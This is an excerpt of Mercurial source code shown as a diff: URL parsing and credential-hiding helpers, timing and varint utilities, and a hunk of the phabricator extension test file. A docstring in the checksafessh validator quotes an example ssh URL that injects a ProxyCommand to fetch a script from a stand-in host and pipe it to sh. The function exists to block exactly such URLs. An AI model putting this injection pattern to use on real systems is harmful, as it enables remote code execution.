3173 >>> bytes(url(b'bundle://../foo'))
3173 >>> bytes(url(b'bundle://../foo'))
3174 'bundle:../foo'
3174 'bundle:../foo'
3175 >>> bytes(url(b'path'))
3175 >>> bytes(url(b'path'))
3176 'path'
3176 'path'
3177 >>> bytes(url(b'file:///tmp/foo/bar'))
3177 >>> bytes(url(b'file:///tmp/foo/bar'))
3178 'file:///tmp/foo/bar'
3178 'file:///tmp/foo/bar'
3179 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3179 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3180 'file:///c:/tmp/foo/bar'
3180 'file:///c:/tmp/foo/bar'
3181 >>> print(url(br'bundle:foo\bar'))
3181 >>> print(url(br'bundle:foo\bar'))
3182 bundle:foo\bar
3182 bundle:foo\bar
3183 >>> print(url(br'file:///D:\data\hg'))
3183 >>> print(url(br'file:///D:\data\hg'))
3184 file:///D:\data\hg
3184 file:///D:\data\hg
3185 """
3185 """
3186 if self._localpath:
3186 if self._localpath:
3187 s = self.path
3187 s = self.path
3188 if self.scheme == b'bundle':
3188 if self.scheme == b'bundle':
3189 s = b'bundle:' + s
3189 s = b'bundle:' + s
3190 if self.fragment:
3190 if self.fragment:
3191 s += b'#' + self.fragment
3191 s += b'#' + self.fragment
3192 return s
3192 return s
3193
3193
3194 s = self.scheme + b':'
3194 s = self.scheme + b':'
3195 if self.user or self.passwd or self.host:
3195 if self.user or self.passwd or self.host:
3196 s += b'//'
3196 s += b'//'
3197 elif self.scheme and (
3197 elif self.scheme and (
3198 not self.path
3198 not self.path
3199 or self.path.startswith(b'/')
3199 or self.path.startswith(b'/')
3200 or hasdriveletter(self.path)
3200 or hasdriveletter(self.path)
3201 ):
3201 ):
3202 s += b'//'
3202 s += b'//'
3203 if hasdriveletter(self.path):
3203 if hasdriveletter(self.path):
3204 s += b'/'
3204 s += b'/'
3205 if self.user:
3205 if self.user:
3206 s += urlreq.quote(self.user, safe=self._safechars)
3206 s += urlreq.quote(self.user, safe=self._safechars)
3207 if self.passwd:
3207 if self.passwd:
3208 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3208 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3209 if self.user or self.passwd:
3209 if self.user or self.passwd:
3210 s += b'@'
3210 s += b'@'
3211 if self.host:
3211 if self.host:
3212 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3212 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3213 s += urlreq.quote(self.host)
3213 s += urlreq.quote(self.host)
3214 else:
3214 else:
3215 s += self.host
3215 s += self.host
3216 if self.port:
3216 if self.port:
3217 s += b':' + urlreq.quote(self.port)
3217 s += b':' + urlreq.quote(self.port)
3218 if self.host:
3218 if self.host:
3219 s += b'/'
3219 s += b'/'
3220 if self.path:
3220 if self.path:
3221 # TODO: similar to the query string, we should not unescape the
3221 # TODO: similar to the query string, we should not unescape the
3222 # path when we store it, the path might contain '%2f' = '/',
3222 # path when we store it, the path might contain '%2f' = '/',
3223 # which we should *not* escape.
3223 # which we should *not* escape.
3224 s += urlreq.quote(self.path, safe=self._safepchars)
3224 s += urlreq.quote(self.path, safe=self._safepchars)
3225 if self.query:
3225 if self.query:
3226 # we store the query in escaped form.
3226 # we store the query in escaped form.
3227 s += b'?' + self.query
3227 s += b'?' + self.query
3228 if self.fragment is not None:
3228 if self.fragment is not None:
3229 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3229 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3230 return s
3230 return s
3231
3231
3232 __str__ = encoding.strmethod(__bytes__)
3232 __str__ = encoding.strmethod(__bytes__)
3233
3233
3234 def authinfo(self):
3234 def authinfo(self):
3235 user, passwd = self.user, self.passwd
3235 user, passwd = self.user, self.passwd
3236 try:
3236 try:
3237 self.user, self.passwd = None, None
3237 self.user, self.passwd = None, None
3238 s = bytes(self)
3238 s = bytes(self)
3239 finally:
3239 finally:
3240 self.user, self.passwd = user, passwd
3240 self.user, self.passwd = user, passwd
3241 if not self.user:
3241 if not self.user:
3242 return (s, None)
3242 return (s, None)
3243 # authinfo[1] is passed to urllib2 password manager, and its
3243 # authinfo[1] is passed to urllib2 password manager, and its
3244 # URIs must not contain credentials. The host is passed in the
3244 # URIs must not contain credentials. The host is passed in the
3245 # URIs list because Python < 2.4.3 uses only that to search for
3245 # URIs list because Python < 2.4.3 uses only that to search for
3246 # a password.
3246 # a password.
3247 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3247 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3248
3248
3249 def isabs(self):
3249 def isabs(self):
3250 if self.scheme and self.scheme != b'file':
3250 if self.scheme and self.scheme != b'file':
3251 return True # remote URL
3251 return True # remote URL
3252 if hasdriveletter(self.path):
3252 if hasdriveletter(self.path):
3253 return True # absolute for our purposes - can't be joined()
3253 return True # absolute for our purposes - can't be joined()
3254 if self.path.startswith(br'\\'):
3254 if self.path.startswith(br'\\'):
3255 return True # Windows UNC path
3255 return True # Windows UNC path
3256 if self.path.startswith(b'/'):
3256 if self.path.startswith(b'/'):
3257 return True # POSIX-style
3257 return True # POSIX-style
3258 return False
3258 return False
3259
3259
3260 def localpath(self):
3260 def localpath(self):
3261 if self.scheme == b'file' or self.scheme == b'bundle':
3261 if self.scheme == b'file' or self.scheme == b'bundle':
3262 path = self.path or b'/'
3262 path = self.path or b'/'
3263 # For Windows, we need to promote hosts containing drive
3263 # For Windows, we need to promote hosts containing drive
3264 # letters to paths with drive letters.
3264 # letters to paths with drive letters.
3265 if hasdriveletter(self._hostport):
3265 if hasdriveletter(self._hostport):
3266 path = self._hostport + b'/' + self.path
3266 path = self._hostport + b'/' + self.path
3267 elif (
3267 elif (
3268 self.host is not None and self.path and not hasdriveletter(path)
3268 self.host is not None and self.path and not hasdriveletter(path)
3269 ):
3269 ):
3270 path = b'/' + path
3270 path = b'/' + path
3271 return path
3271 return path
3272 return self._origpath
3272 return self._origpath
3273
3273
3274 def islocal(self):
3274 def islocal(self):
3275 '''whether localpath will return something that posixfile can open'''
3275 '''whether localpath will return something that posixfile can open'''
3276 return (
3276 return (
3277 not self.scheme
3277 not self.scheme
3278 or self.scheme == b'file'
3278 or self.scheme == b'file'
3279 or self.scheme == b'bundle'
3279 or self.scheme == b'bundle'
3280 )
3280 )
3281
3281
3282
3282
3283 def hasscheme(path):
3283 def hasscheme(path):
3284 return bool(url(path).scheme)
3284 return bool(url(path).scheme)
3285
3285
3286
3286
3287 def hasdriveletter(path):
3287 def hasdriveletter(path):
3288 return path and path[1:2] == b':' and path[0:1].isalpha()
3288 return path and path[1:2] == b':' and path[0:1].isalpha()
3289
3289
3290
3290
3291 def urllocalpath(path):
3291 def urllocalpath(path):
3292 return url(path, parsequery=False, parsefragment=False).localpath()
3292 return url(path, parsequery=False, parsefragment=False).localpath()
3293
3293
3294
3294
3295 def checksafessh(path):
3295 def checksafessh(path):
3296 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3296 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3297
3297
3298 This is a sanity check for ssh urls. ssh will parse the first item as
3298 This is a sanity check for ssh urls. ssh will parse the first item as
3299 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3299 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3300 Let's prevent these potentially exploited urls entirely and warn the
3300 Let's prevent these potentially exploited urls entirely and warn the
3301 user.
3301 user.
3302
3302
3303 Raises an error.Abort when the url is unsafe.
3303 Raises an error.Abort when the url is unsafe.
3304 """
3304 """
3305 path = urlreq.unquote(path)
3305 path = urlreq.unquote(path)
3306 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3306 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3307 raise error.Abort(
3307 raise error.Abort(
3308 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3308 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3309 )
3309 )
3310
3310
3311
3311
3312 def hidepassword(u):
3312 def hidepassword(u):
3313 '''hide user credential in a url string'''
3313 '''hide user credential in a url string'''
3314 u = url(u)
3314 u = url(u)
3315 if u.passwd:
3315 if u.passwd:
3316 u.passwd = b'***'
3316 u.passwd = b'***'
3317 return bytes(u)
3317 return bytes(u)
3318
3318
3319
3319
3320 def removeauth(u):
3320 def removeauth(u):
3321 '''remove all authentication information from a url string'''
3321 '''remove all authentication information from a url string'''
3322 u = url(u)
3322 u = url(u)
3323 u.user = u.passwd = None
3323 u.user = u.passwd = None
3324 return bytes(u)
3324 return bytes(u)
3325
3325
3326
3326
3327 timecount = unitcountfn(
3327 timecount = unitcountfn(
3328 (1, 1e3, _(b'%.0f s')),
3328 (1, 1e3, _(b'%.0f s')),
3329 (100, 1, _(b'%.1f s')),
3329 (100, 1, _(b'%.1f s')),
3330 (10, 1, _(b'%.2f s')),
3330 (10, 1, _(b'%.2f s')),
3331 (1, 1, _(b'%.3f s')),
3331 (1, 1, _(b'%.3f s')),
3332 (100, 0.001, _(b'%.1f ms')),
3332 (100, 0.001, _(b'%.1f ms')),
3333 (10, 0.001, _(b'%.2f ms')),
3333 (10, 0.001, _(b'%.2f ms')),
3334 (1, 0.001, _(b'%.3f ms')),
3334 (1, 0.001, _(b'%.3f ms')),
3335 (100, 0.000001, _(b'%.1f us')),
3335 (100, 0.000001, _(b'%.1f us')),
3336 (10, 0.000001, _(b'%.2f us')),
3336 (10, 0.000001, _(b'%.2f us')),
3337 (1, 0.000001, _(b'%.3f us')),
3337 (1, 0.000001, _(b'%.3f us')),
3338 (100, 0.000000001, _(b'%.1f ns')),
3338 (100, 0.000000001, _(b'%.1f ns')),
3339 (10, 0.000000001, _(b'%.2f ns')),
3339 (10, 0.000000001, _(b'%.2f ns')),
3340 (1, 0.000000001, _(b'%.3f ns')),
3340 (1, 0.000000001, _(b'%.3f ns')),
3341 )
3341 )
3342
3342
3343
3343
3344 @attr.s
3344 @attr.s
3345 class timedcmstats(object):
3345 class timedcmstats(object):
3346 """Stats information produced by the timedcm context manager on entering."""
3346 """Stats information produced by the timedcm context manager on entering."""
3347
3347
3348 # the starting value of the timer as a float (meaning and resulution is
3348 # the starting value of the timer as a float (meaning and resulution is
3349 # platform dependent, see util.timer)
3349 # platform dependent, see util.timer)
3350 start = attr.ib(default=attr.Factory(lambda: timer()))
3350 start = attr.ib(default=attr.Factory(lambda: timer()))
3351 # the number of seconds as a floating point value; starts at 0, updated when
3351 # the number of seconds as a floating point value; starts at 0, updated when
3352 # the context is exited.
3352 # the context is exited.
3353 elapsed = attr.ib(default=0)
3353 elapsed = attr.ib(default=0)
3354 # the number of nested timedcm context managers.
3354 # the number of nested timedcm context managers.
3355 level = attr.ib(default=1)
3355 level = attr.ib(default=1)
3356
3356
3357 def __bytes__(self):
3357 def __bytes__(self):
3358 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3358 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3359
3359
3360 __str__ = encoding.strmethod(__bytes__)
3360 __str__ = encoding.strmethod(__bytes__)
3361
3361
3362
3362
3363 @contextlib.contextmanager
3363 @contextlib.contextmanager
3364 def timedcm(whencefmt, *whenceargs):
3364 def timedcm(whencefmt, *whenceargs):
3365 """A context manager that produces timing information for a given context.
3365 """A context manager that produces timing information for a given context.
3366
3366
3367 On entering a timedcmstats instance is produced.
3367 On entering a timedcmstats instance is produced.
3368
3368
3369 This context manager is reentrant.
3369 This context manager is reentrant.
3370
3370
3371 """
3371 """
3372 # track nested context managers
3372 # track nested context managers
3373 timedcm._nested += 1
3373 timedcm._nested += 1
3374 timing_stats = timedcmstats(level=timedcm._nested)
3374 timing_stats = timedcmstats(level=timedcm._nested)
3375 try:
3375 try:
3376 with tracing.log(whencefmt, *whenceargs):
3376 with tracing.log(whencefmt, *whenceargs):
3377 yield timing_stats
3377 yield timing_stats
3378 finally:
3378 finally:
3379 timing_stats.elapsed = timer() - timing_stats.start
3379 timing_stats.elapsed = timer() - timing_stats.start
3380 timedcm._nested -= 1
3380 timedcm._nested -= 1
3381
3381
3382
3382
3383 timedcm._nested = 0
3383 timedcm._nested = 0
3384
3384
3385
3385
3386 def timed(func):
3386 def timed(func):
3387 '''Report the execution time of a function call to stderr.
3387 '''Report the execution time of a function call to stderr.
3388
3388
3389 During development, use as a decorator when you need to measure
3389 During development, use as a decorator when you need to measure
3390 the cost of a function, e.g. as follows:
3390 the cost of a function, e.g. as follows:
3391
3391
3392 @util.timed
3392 @util.timed
3393 def foo(a, b, c):
3393 def foo(a, b, c):
3394 pass
3394 pass
3395 '''
3395 '''
3396
3396
3397 def wrapper(*args, **kwargs):
3397 def wrapper(*args, **kwargs):
3398 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3398 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3399 result = func(*args, **kwargs)
3399 result = func(*args, **kwargs)
3400 stderr = procutil.stderr
3400 stderr = procutil.stderr
3401 stderr.write(
3401 stderr.write(
3402 b'%s%s: %s\n'
3402 b'%s%s: %s\n'
3403 % (
3403 % (
3404 b' ' * time_stats.level * 2,
3404 b' ' * time_stats.level * 2,
3405 pycompat.bytestr(func.__name__),
3405 pycompat.bytestr(func.__name__),
3406 time_stats,
3406 time_stats,
3407 )
3407 )
3408 )
3408 )
3409 return result
3409 return result
3410
3410
3411 return wrapper
3411 return wrapper
3412
3412
3413
3413
3414 _sizeunits = (
3414 _sizeunits = (
3415 (b'm', 2 ** 20),
3415 (b'm', 2 ** 20),
3416 (b'k', 2 ** 10),
3416 (b'k', 2 ** 10),
3417 (b'g', 2 ** 30),
3417 (b'g', 2 ** 30),
3418 (b'kb', 2 ** 10),
3418 (b'kb', 2 ** 10),
3419 (b'mb', 2 ** 20),
3419 (b'mb', 2 ** 20),
3420 (b'gb', 2 ** 30),
3420 (b'gb', 2 ** 30),
3421 (b'b', 1),
3421 (b'b', 1),
3422 )
3422 )
3423
3423
3424
3424
3425 def sizetoint(s):
3425 def sizetoint(s):
3426 '''Convert a space specifier to a byte count.
3426 '''Convert a space specifier to a byte count.
3427
3427
3428 >>> sizetoint(b'30')
3428 >>> sizetoint(b'30')
3429 30
3429 30
3430 >>> sizetoint(b'2.2kb')
3430 >>> sizetoint(b'2.2kb')
3431 2252
3431 2252
3432 >>> sizetoint(b'6M')
3432 >>> sizetoint(b'6M')
3433 6291456
3433 6291456
3434 '''
3434 '''
3435 t = s.strip().lower()
3435 t = s.strip().lower()
3436 try:
3436 try:
3437 for k, u in _sizeunits:
3437 for k, u in _sizeunits:
3438 if t.endswith(k):
3438 if t.endswith(k):
3439 return int(float(t[: -len(k)]) * u)
3439 return int(float(t[: -len(k)]) * u)
3440 return int(t)
3440 return int(t)
3441 except ValueError:
3441 except ValueError:
3442 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3442 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3443
3443
3444
3444
3445 class hooks(object):
3445 class hooks(object):
3446 '''A collection of hook functions that can be used to extend a
3446 '''A collection of hook functions that can be used to extend a
3447 function's behavior. Hooks are called in lexicographic order,
3447 function's behavior. Hooks are called in lexicographic order,
3448 based on the names of their sources.'''
3448 based on the names of their sources.'''
3449
3449
3450 def __init__(self):
3450 def __init__(self):
3451 self._hooks = []
3451 self._hooks = []
3452
3452
3453 def add(self, source, hook):
3453 def add(self, source, hook):
3454 self._hooks.append((source, hook))
3454 self._hooks.append((source, hook))
3455
3455
3456 def __call__(self, *args):
3456 def __call__(self, *args):
3457 self._hooks.sort(key=lambda x: x[0])
3457 self._hooks.sort(key=lambda x: x[0])
3458 results = []
3458 results = []
3459 for source, hook in self._hooks:
3459 for source, hook in self._hooks:
3460 results.append(hook(*args))
3460 results.append(hook(*args))
3461 return results
3461 return results
3462
3462
3463
3463
3464 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3464 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3465 '''Yields lines for a nicely formatted stacktrace.
3465 '''Yields lines for a nicely formatted stacktrace.
3466 Skips the 'skip' last entries, then return the last 'depth' entries.
3466 Skips the 'skip' last entries, then return the last 'depth' entries.
3467 Each file+linenumber is formatted according to fileline.
3467 Each file+linenumber is formatted according to fileline.
3468 Each line is formatted according to line.
3468 Each line is formatted according to line.
3469 If line is None, it yields:
3469 If line is None, it yields:
3470 length of longest filepath+line number,
3470 length of longest filepath+line number,
3471 filepath+linenumber,
3471 filepath+linenumber,
3472 function
3472 function
3473
3473
3474 Not be used in production code but very convenient while developing.
3474 Not be used in production code but very convenient while developing.
3475 '''
3475 '''
3476 entries = [
3476 entries = [
3477 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3477 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3478 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3478 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3479 ][-depth:]
3479 ][-depth:]
3480 if entries:
3480 if entries:
3481 fnmax = max(len(entry[0]) for entry in entries)
3481 fnmax = max(len(entry[0]) for entry in entries)
3482 for fnln, func in entries:
3482 for fnln, func in entries:
3483 if line is None:
3483 if line is None:
3484 yield (fnmax, fnln, func)
3484 yield (fnmax, fnln, func)
3485 else:
3485 else:
3486 yield line % (fnmax, fnln, func)
3486 yield line % (fnmax, fnln, func)
3487
3487
3488
3488
3489 def debugstacktrace(
3489 def debugstacktrace(
3490 msg=b'stacktrace',
3490 msg=b'stacktrace',
3491 skip=0,
3491 skip=0,
3492 f=procutil.stderr,
3492 f=procutil.stderr,
3493 otherf=procutil.stdout,
3493 otherf=procutil.stdout,
3494 depth=0,
3494 depth=0,
3495 prefix=b'',
3495 prefix=b'',
3496 ):
3496 ):
3497 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3497 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3498 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3498 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3499 By default it will flush stdout first.
3499 By default it will flush stdout first.
3500 It can be used everywhere and intentionally does not require an ui object.
3500 It can be used everywhere and intentionally does not require an ui object.
3501 Not be used in production code but very convenient while developing.
3501 Not be used in production code but very convenient while developing.
3502 '''
3502 '''
3503 if otherf:
3503 if otherf:
3504 otherf.flush()
3504 otherf.flush()
3505 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3505 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3506 for line in getstackframes(skip + 1, depth=depth):
3506 for line in getstackframes(skip + 1, depth=depth):
3507 f.write(prefix + line)
3507 f.write(prefix + line)
3508 f.flush()
3508 f.flush()
3509
3509
3510
3510
3511 # convenient shortcut
3511 # convenient shortcut
3512 dst = debugstacktrace
3512 dst = debugstacktrace
3513
3513
3514
3514
3515 def safename(f, tag, ctx, others=None):
3515 def safename(f, tag, ctx, others=None):
3516 """
3516 """
3517 Generate a name that it is safe to rename f to in the given context.
3517 Generate a name that it is safe to rename f to in the given context.
3518
3518
3519 f: filename to rename
3519 f: filename to rename
3520 tag: a string tag that will be included in the new name
3520 tag: a string tag that will be included in the new name
3521 ctx: a context, in which the new name must not exist
3521 ctx: a context, in which the new name must not exist
3522 others: a set of other filenames that the new name must not be in
3522 others: a set of other filenames that the new name must not be in
3523
3523
3524 Returns a file name of the form oldname~tag[~number] which does not exist
3524 Returns a file name of the form oldname~tag[~number] which does not exist
3525 in the provided context and is not in the set of other names.
3525 in the provided context and is not in the set of other names.
3526 """
3526 """
3527 if others is None:
3527 if others is None:
3528 others = set()
3528 others = set()
3529
3529
3530 fn = b'%s~%s' % (f, tag)
3530 fn = b'%s~%s' % (f, tag)
3531 if fn not in ctx and fn not in others:
3531 if fn not in ctx and fn not in others:
3532 return fn
3532 return fn
3533 for n in itertools.count(1):
3533 for n in itertools.count(1):
3534 fn = b'%s~%s~%s' % (f, tag, n)
3534 fn = b'%s~%s~%s' % (f, tag, n)
3535 if fn not in ctx and fn not in others:
3535 if fn not in ctx and fn not in others:
3536 return fn
3536 return fn
3537
3537
3538
3538
3539 def readexactly(stream, n):
3539 def readexactly(stream, n):
3540 '''read n bytes from stream.read and abort if less was available'''
3540 '''read n bytes from stream.read and abort if less was available'''
3541 s = stream.read(n)
3541 s = stream.read(n)
3542 if len(s) < n:
3542 if len(s) < n:
3543 raise error.Abort(
3543 raise error.Abort(
3544 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3544 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3545 % (len(s), n)
3545 % (len(s), n)
3546 )
3546 )
3547 return s
3547 return s
3548
3548
3549
3549
3550 def uvarintencode(value):
3550 def uvarintencode(value):
3551 """Encode an unsigned integer value to a varint.
3551 """Encode an unsigned integer value to a varint.
3552
3552
3553 A varint is a variable length integer of 1 or more bytes. Each byte
3553 A varint is a variable length integer of 1 or more bytes. Each byte
3554 except the last has the most significant bit set. The lower 7 bits of
3554 except the last has the most significant bit set. The lower 7 bits of
3555 each byte store the 2's complement representation, least significant group
3555 each byte store the 2's complement representation, least significant group
3556 first.
3556 first.
3557
3557
3558 >>> uvarintencode(0)
3558 >>> uvarintencode(0)
3559 '\\x00'
3559 '\\x00'
3560 >>> uvarintencode(1)
3560 >>> uvarintencode(1)
3561 '\\x01'
3561 '\\x01'
3562 >>> uvarintencode(127)
3562 >>> uvarintencode(127)
3563 '\\x7f'
3563 '\\x7f'
3564 >>> uvarintencode(1337)
3564 >>> uvarintencode(1337)
3565 '\\xb9\\n'
3565 '\\xb9\\n'
3566 >>> uvarintencode(65536)
3566 >>> uvarintencode(65536)
3567 '\\x80\\x80\\x04'
3567 '\\x80\\x80\\x04'
3568 >>> uvarintencode(-1)
3568 >>> uvarintencode(-1)
3569 Traceback (most recent call last):
3569 Traceback (most recent call last):
3570 ...
3570 ...
3571 ProgrammingError: negative value for uvarint: -1
3571 ProgrammingError: negative value for uvarint: -1
3572 """
3572 """
3573 if value < 0:
3573 if value < 0:
3574 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3574 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3575 bits = value & 0x7F
3575 bits = value & 0x7F
3576 value >>= 7
3576 value >>= 7
3577 bytes = []
3577 bytes = []
3578 while value:
3578 while value:
3579 bytes.append(pycompat.bytechr(0x80 | bits))
3579 bytes.append(pycompat.bytechr(0x80 | bits))
3580 bits = value & 0x7F
3580 bits = value & 0x7F
3581 value >>= 7
3581 value >>= 7
3582 bytes.append(pycompat.bytechr(bits))
3582 bytes.append(pycompat.bytechr(bits))
3583
3583
3584 return b''.join(bytes)
3584 return b''.join(bytes)
3585
3585
3586
3586
3587 def uvarintdecodestream(fh):
3587 def uvarintdecodestream(fh):
3588 """Decode an unsigned variable length integer from a stream.
3588 """Decode an unsigned variable length integer from a stream.
3589
3589
3590 The passed argument is anything that has a ``.read(N)`` method.
3590 The passed argument is anything that has a ``.read(N)`` method.
3591
3591
3592 >>> try:
3592 >>> try:
3593 ... from StringIO import StringIO as BytesIO
3593 ... from StringIO import StringIO as BytesIO
3594 ... except ImportError:
3594 ... except ImportError:
3595 ... from io import BytesIO
3595 ... from io import BytesIO
3596 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3596 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3597 0
3597 0
3598 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3598 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3599 1
3599 1
3600 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3600 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3601 127
3601 127
3602 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3602 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3603 1337
3603 1337
3604 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3604 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3605 65536
3605 65536
3606 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3606 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3607 Traceback (most recent call last):
3607 Traceback (most recent call last):
3608 ...
3608 ...
3609 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3609 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3610 """
3610 """
3611 result = 0
3611 result = 0
3612 shift = 0
3612 shift = 0
3613 while True:
3613 while True:
3614 byte = ord(readexactly(fh, 1))
3614 byte = ord(readexactly(fh, 1))
3615 result |= (byte & 0x7F) << shift
3615 result |= (byte & 0x7F) << shift
3616 if not (byte & 0x80):
3616 if not (byte & 0x80):
3617 return result
3617 return result
3618 shift += 7
3618 shift += 7
@@ -1,311 +1,326 b''
1 #require vcr
1 #require vcr
2 $ cat >> $HGRCPATH <<EOF
2 $ cat >> $HGRCPATH <<EOF
3 > [extensions]
3 > [extensions]
4 > phabricator =
4 > phabricator =
5 > EOF
5 > EOF
6 $ hg init repo
6 $ hg init repo
7 $ cd repo
7 $ cd repo
8 $ cat >> .hg/hgrc <<EOF
8 $ cat >> .hg/hgrc <<EOF
9 > [phabricator]
9 > [phabricator]
10 > url = https://phab.mercurial-scm.org/
10 > url = https://phab.mercurial-scm.org/
11 > callsign = HG
11 > callsign = HG
12 >
12 >
13 > [auth]
13 > [auth]
14 > hgphab.schemes = https
14 > hgphab.schemes = https
15 > hgphab.prefix = phab.mercurial-scm.org
15 > hgphab.prefix = phab.mercurial-scm.org
16 > # When working on the extension and making phabricator interaction
16 > # When working on the extension and making phabricator interaction
17 > # changes, edit this to be a real phabricator token. When done, edit
17 > # changes, edit this to be a real phabricator token. When done, edit
18 > # it back. The VCR transcripts will be auto-sanitised to replace your real
18 > # it back. The VCR transcripts will be auto-sanitised to replace your real
19 > # token with this value.
19 > # token with this value.
20 > hgphab.phabtoken = cli-hahayouwish
20 > hgphab.phabtoken = cli-hahayouwish
21 > EOF
21 > EOF
22 $ VCR="$TESTDIR/phabricator"
22 $ VCR="$TESTDIR/phabricator"
23
23
24 Error is handled reasonably. We override the phabtoken here so that
24 Error is handled reasonably. We override the phabtoken here so that
25 when you're developing changes to phabricator.py you can edit the
25 when you're developing changes to phabricator.py you can edit the
26 above config and have a real token in the test but not have to edit
26 above config and have a real token in the test but not have to edit
27 this test.
27 this test.
28 $ hg phabread --config auth.hgphab.phabtoken=cli-notavalidtoken \
28 $ hg phabread --config auth.hgphab.phabtoken=cli-notavalidtoken \
29 > --test-vcr "$VCR/phabread-conduit-error.json" D4480 | head
29 > --test-vcr "$VCR/phabread-conduit-error.json" D4480 | head
30 abort: Conduit Error (ERR-INVALID-AUTH): API token "cli-notavalidtoken" has the wrong length. API tokens should be 32 characters long.
30 abort: Conduit Error (ERR-INVALID-AUTH): API token "cli-notavalidtoken" has the wrong length. API tokens should be 32 characters long.
31
31
32 Missing arguments print the command help
33
34 $ hg phabread
35 hg phabread: invalid arguments
36 hg phabread DREVSPEC [OPTIONS]
37
38 print patches from Phabricator suitable for importing
39
40 options:
41
42 --stack read dependencies
43
44 (use 'hg phabread -h' to show more help)
45 [255]
46
32 Basic phabread:
47 Basic phabread:
33 $ hg phabread --test-vcr "$VCR/phabread-4480.json" D4480 | head
48 $ hg phabread --test-vcr "$VCR/phabread-4480.json" D4480 | head
34 # HG changeset patch
49 # HG changeset patch
35 # Date 1536771503 0
50 # Date 1536771503 0
36 # Parent a5de21c9e3703f8e8eb064bd7d893ff2f703c66a
51 # Parent a5de21c9e3703f8e8eb064bd7d893ff2f703c66a
37 exchangev2: start to implement pull with wire protocol v2
52 exchangev2: start to implement pull with wire protocol v2
38
53
39 Wire protocol version 2 will take a substantially different
54 Wire protocol version 2 will take a substantially different
40 approach to exchange than version 1 (at least as far as pulling
55 approach to exchange than version 1 (at least as far as pulling
41 is concerned).
56 is concerned).
42
57
43 This commit establishes a new exchangev2 module for holding
58 This commit establishes a new exchangev2 module for holding
44
59
45 phabupdate with an accept:
60 phabupdate with an accept:
46 $ hg phabupdate --accept D4564 \
61 $ hg phabupdate --accept D4564 \
47 > -m 'I think I like where this is headed. Will read rest of series later.'\
62 > -m 'I think I like where this is headed. Will read rest of series later.'\
48 > --test-vcr "$VCR/accept-4564.json"
63 > --test-vcr "$VCR/accept-4564.json"
49 abort: Conduit Error (ERR-CONDUIT-CORE): Validation errors:
64 abort: Conduit Error (ERR-CONDUIT-CORE): Validation errors:
50 - You can not accept this revision because it has already been closed. Only open revisions can be accepted.
65 - You can not accept this revision because it has already been closed. Only open revisions can be accepted.
51 [255]
66 [255]
52 $ hg phabupdate --accept D7913 -m 'LGTM' --test-vcr "$VCR/accept-7913.json"
67 $ hg phabupdate --accept D7913 -m 'LGTM' --test-vcr "$VCR/accept-7913.json"
53
68
54 Create a differential diff:
69 Create a differential diff:
55 $ HGENCODING=utf-8; export HGENCODING
70 $ HGENCODING=utf-8; export HGENCODING
56 $ echo alpha > alpha
71 $ echo alpha > alpha
57 $ hg ci --addremove -m 'create alpha for phabricator test €'
72 $ hg ci --addremove -m 'create alpha for phabricator test €'
58 adding alpha
73 adding alpha
59 $ hg phabsend -r . --test-vcr "$VCR/phabsend-create-alpha.json"
74 $ hg phabsend -r . --test-vcr "$VCR/phabsend-create-alpha.json"
60 D7915 - created - d386117f30e6: create alpha for phabricator test \xe2\x82\xac (esc)
75 D7915 - created - d386117f30e6: create alpha for phabricator test \xe2\x82\xac (esc)
61 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/d386117f30e6-24ffe649-phabsend.hg
76 saved backup bundle to $TESTTMP/repo/.hg/strip-backup/d386117f30e6-24ffe649-phabsend.hg
